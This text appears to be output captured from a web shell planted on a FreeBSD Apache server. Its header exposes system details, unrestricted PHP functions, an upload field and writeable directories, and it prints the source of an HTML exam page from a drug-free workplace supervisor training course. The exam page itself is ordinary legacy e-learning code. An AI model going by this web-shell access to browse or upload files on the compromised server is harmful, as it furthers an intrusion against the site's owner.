KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/thewalshgroup/Supervisor/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/thewalshgroup/Supervisor/final_exam_final_exam_no_dot.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<!--GENERATED BY:  Lectora Professional Publishing Suite v.X.4(7611) (http://www.trivantis.com) -->


<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Final Exam NO DOT</title>

<link rel="stylesheet" href="trivantis.css" type="text/css" />
<style text="text/css">
  body { background-color:#000000; }
    span.text64Font1 { font-size:24px; font-family:"Times", serif; color:#deac69;}
    span.text64Font2 { font-size:19px; font-family:"Times New Roman", serif; color:#010101;}
    span.text99Font1 { font-size:13px; font-family:"Arial", sans serif; color:#ffffff;}
    span.text1398Font1 { font-size:27px; font-family:"Times New Roman", serif; color:#ffffff; font-style:italic;}
    span.text1398Font2 { font-size:19px; font-family:"Times New Roman", serif; color:#010101;}
    span.text2095Font1 { font-size:16px; font-family:"Times New Roman", serif; color:#000000; font-weight:bold;}
</style>

<script language = "JavaScript" src="trivantis.js"></script>
<script language = "JavaScript" src="trivantis-timedate.js"></script>
<script language = "JavaScript" src="trivantis-cookie.js"></script>
<script language = "JavaScript" src="trivantis-button.js"></script>
<script language = "JavaScript" src="trivantis-image.js"></script>
<script language = "JavaScript" src="trivantis-inline.js"></script>
<script language = "JavaScript">

<!-- 
trivWeb20Popups = true;
if( !is.min )
  document.write( 'Your browser does not support dynamic html. Please download a current version of either <a href="http://www.microsoft.com/ie/">Microsoft Internet Explorer</a> or <a href="http://www.mozilla.com/en-US/firefox/">Mozilla Firefox </a> and try visiting our site again.  Thank You.<br /><br />' )

var pageLayer = null
var winW = screen.width
var winH = screen.height

function findWH() {
    winW = (is.ns)? window.innerWidth-16 : document.body.offsetWidth-20
    winH = (is.ns)? window.innerHeight   : document.body.offsetHeight
}

function ReFlow() {
  if (is.ns4 && winW && (winW!=window.innerWidth-16 || winH!=window.innerHeight))
    ObjLayerActionGoTo( 'final_exam_final_exam_no_dot.html' )
  else {
    findWH()
    var left = (winW > 800) ? (winW-800)/2 : 0
    if (pageLayer)
    {
      pageLayer.moveTo( left, 0 );
      pageLayer.hasMoved = true;
      pageLayer.newX = left;
      pageLayer.newY = 0;
    }
  }
}


VarFinalNoDOT = new Variable( 'VarFinalNoDOT', '0', 0, 0, null, null, 'supervisor_version' )

onload = init
onunload = finish

function init() {
  findWH()
  if( is.min ){
    setTimeout( "preload( 'images/image_1_1382.jpg','images/buttonredclosedrugmenu.jpg','images/buttongreenclosedrugmenu.jpg','images/text2095_1.gif','images/text2095_2.gif','images/text2095_3.gif','images/text2095_4.gif','images/text2095_5.gif','images/text2095_6.gif','images/text2095_7.gif','images/text2095_8.gif' )", 0 )
    pageLayer = new ObjLayer( 'pageDIV' );
    ReFlow();
    pageLayer.show();
    button1420.init()
    text64.init()
    text99.init()
    text1398.init()
    image1383.init()
    text2095.init()
    anim1419.init()
    button1420.activate()
    text64.activate()
    text99.activate()
    text1398.activate()
    image1383.activate()
    text2095.activate()
    anim1419.activate()
    if( location.hash )
    {
      var newHash
      if( location.hash.charAt(0) == '#' )
        newHash = location.hash.slice( 1 )
      else
        newHash = location.hash
      location.hash = newHash
    }
    setTimeout( 'trivUpdateTOC( "final_exam_final_exam_no_dot.html", "final_exam_final_exam_no_dot.html", 1 )', 500 )
  }
}

var trivGoToPage = null
var trivCompleteCnt = 1;
var hasProcessedExitActions = false;
var trivWndFeedback = null;
var trivWndImmFeedback = null;
var currFeedbackIdx = 0;
var trivPageExited = false;

function finish() {
}

function trivOnFocus() {
    if( trivWndFeedback )
    {
      try{if( (!is.ie||trivWndFeedback.initialized) && !trivWndFeedback.closed )
      {
        trivWndFeedback.close()
        trivWndFeedback = null
      }}catch(e){}
      setTimeout( 'checkLeavePage()', 100)
    }
}

function checkLeavePage() {
    if( ( trivWndFeedback == null || trivWndFeedback.closed ) && ( trivWndImmFeedback == null || trivWndImmFeedback.closed ) )
    {
        trivWndFeedback = null;
        trivWndImmFeedback = null;
        currFeedbackIdx++;
        if( currFeedbackIdx > -1)
        {
            trivLeavePage();
          return;
        }
        else if( !checkQuestions( true ))
          return;
    }
    setTimeout( 'checkLeavePage()', 100)
}

function trivExitPage( newPage, bFeedback ) {
    if( newPage.indexOf( "ObjLayerAction" ) >= 0 || newPage.indexOf( ".action" ) >= 0 || newPage.indexOf( "history.back()" ) >= 0) trivGoToPage = newPage
    else trivGoToPage = 'ObjLayerActionGoTo("' + newPage + '")'
    if( !hasProcessedExitActions ) {
        findWH()
        hasProcessedExitActions = true
        setTimeout( 'checkLeavePage()', 100)
    }
}

function trivLeavePage() {
    trivCompleteCnt--
    if( trivCompleteCnt <= 0 ) {
        hasProcessedExitActions = false
        eval( trivGoToPage )
        trivGoToPage = null;
        trivPageExited = true;
    }
}

function trivPrevPage() {
    trivExitPage( 'course_summary_module_14_completion.html', true )
}

function trivNextPage() {
    trivExitPage( 'final_exam_final_exam_yes.html', true )
}

function trivUpdateTOC( currPage, parPage, bRecurse ) {
    var i
}

function trivUpdateEntry() {
}

function trivResetEntry() {
}

function action1420(fn){
    
    if(fn) eval(fn);
}

function action1421(fn){
    trivExitPage('course_main_menu.html',true);
    if(fn) eval(fn);
}

function button1420onUp() {
  action1420();action1421();
}

function action2107(fn){
    if( text2095.eatOnUp==true ){
        text2095.eatOnUp=false;
        return;
    }
    text2095.actionChangeContents(VarFinalNoDOT.getValue(),'alignleft','1'); 
    if(fn) eval(fn);
}

function text2095onUp() {
  action2107();
}

if( is.min ){
button1420 = new ObjButton('button1420','Close Final Test',616,451,109,69,1,17,'div')
button1420.setImages('images/buttonredclosedrugmenu.jpg','images/buttongreenclosedrugmenu.jpg','images/buttongreenclosedrugmenu.jpg')
button1420.onUp = button1420onUp
button1420.hasOnUp = true
button1420.capture=4
button1420.build()

text64 = new ObjInline('text64',null,2,16,384,29,1,1,null,'div')
text64.build()

text99 = new ObjInline('text99',null,4,1,200,16,1,2,null,'div')
text99.build()

text1398 = new ObjInline('text1398',null,209,65,383,35,1,3,null,'div')
text1398.build()

image1383 = new ObjImage('image1383','images/image_1_1382.jpg','Final Exam Bg',50,70,700,500,1,4,'div')
image1383.build()

text2095 = new ObjInline('text2095',null,86,484,241,29,1,5,'#c0c0c0','div')
text2095.onUp = text2095onUp
text2095.hasOnUp = true
text2095.capture=4
text2095.build()

anim1419 = new ObjInline('anim1419','Final Exam No DOT',87,129,626,306,1,6,'div');
anim1419.iType='flash';
if (is.Mac) {
anim1419.addParm( "<object type='application/x-shockwave-flash' data='images/final_exam_no_dot.swf' width='626' height='306' id='swfanim1419'>" )
}
else{
anim1419.addParm( "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' codebase='//download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0' width='626' height='306' name='swfanim1419' id='swfanim1419'>" )
}
anim1419.addParm( "<param name='movie' value='images/final_exam_no_dot.swf'>" )
anim1419.addParm( "<param name='allowScriptAccess' value='always'>" )
anim1419.addParm( "<param name='play' value='true'>" )
anim1419.autoPlay = true;
if (!is.Mac) {
anim1419.addParm( "<embed src='images/final_exam_no_dot.swf' width='626' height='306' type='application/x-shockwave-flash' pluginspage='//www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash' allowScriptAccess='always' name='swfanim1419' swliveconnect='true' play='true'>" )
anim1419.addParm( "</embed> </object>" )
}
else {
anim1419.addParm( "</object>" )
}
anim1419.build()



writeStyleSheets(
    button1420.css+
    text64.css+
    text99.css+
    text1398.css+
    image1383.css+
    text2095.css+
    anim1419.css
    )
}
// -->

</script>
</head>

<body onfocus="trivOnFocus()" onResize="ReFlow()">

<script language="JavaScript">
if( is.min ){
    findWH()
    var left = (winW > 800) ? (winW-800)/2 : 0
    document.write('<style text="text/css">#pageDIV { position: absolute; top:0px; left: ' + left + 'px; width:800px; height:600px; ' )
    document.write('} ></style>')
    document.write('<DIV id=\"pageDIV\">')
}
</script>

<script language="JavaScript">
if( is.min ){
    document.write(button1420.div)
}
</script>

<div id="text64"><a name="text64anc"></a>
<p  style="margin-left:0px;text-indent:0px;margin-top:0px;margin-bottom:0px;text-align:left;" >
<span class="text64Font1"  >Supervisor Training</span ><span class="text64Font2" style="background-color:transparent" >
</span ></p >
</div>

<div id="text99"><a name="text99anc"></a>
<p  style="margin-left:0px;text-indent:0px;margin-top:0px;margin-bottom:0px;text-align:left;" >
<span class="text99Font1"  >Drug-Free Workplace
</span ></p >
</div>

<div id="text1398"><a name="text1398anc"></a>
<p  style="margin-left:0px;text-indent:0px;margin-top:0px;margin-bottom:0px;text-align:center;" >
<span class="text1398Font1"  >Final Examination</span ><span class="text1398Font2" style="background-color:transparent" >
</span ></p >
</div>

<script language="JavaScript">
if( is.min ){
    document.write(image1383.div)
}
</script>

<div id="text2095"><a name="text2095anc" href="javascript:text2095.onUp()"></a>
<div style="cursor:pointer">
<table cellpadding=0 cellspacing=0 width='100%' height='100%' border=0>
<tr>
<td height='4' width='4' background='images/text2095_1.gif' style='background-repeat:none;'></td>
<td height='4' width='*' background='images/text2095_2.gif' style='background-repeat:repeat-x;'></td>
<td height='4' width='4' background='images/text2095_3.gif' style='background-repeat:none;'></td>
</tr>
<tr>
<td height='*' width='4' background='images/text2095_4.gif'></td>
<td width='*' valign='top' height='*'>
<div style='height:21px; overflow:hidden'>
<!--split=text2095ter-->
<p  style="margin-left:0px;text-indent:0px;margin-top:0px;margin-bottom:0px;text-align:left;" >
<span class="text2095Font1"  >click for current correct score
</span ></p >

<!--split=text2095ter-->
</div></td>
<td height='*' width='4' background='images/text2095_5.gif'></td>
</tr>
<tr>
<td height='4' width='4' background='images/text2095_6.gif' style='background-repeat:none;'></td>
<td height='4' width='*' background='images/text2095_7.gif' style='background-repeat:repeat-x;'></td>
<td height='4' width='4' background='images/text2095_8.gif' style='background-repeat:none;'></td>
</tr>
</table>
</div></div>

<script language="JavaScript">
if( is.min ){
    document.write(anim1419.div)
    document.write("</DIV>")
}
</script>

</body>
</html>

Anon7 - 2021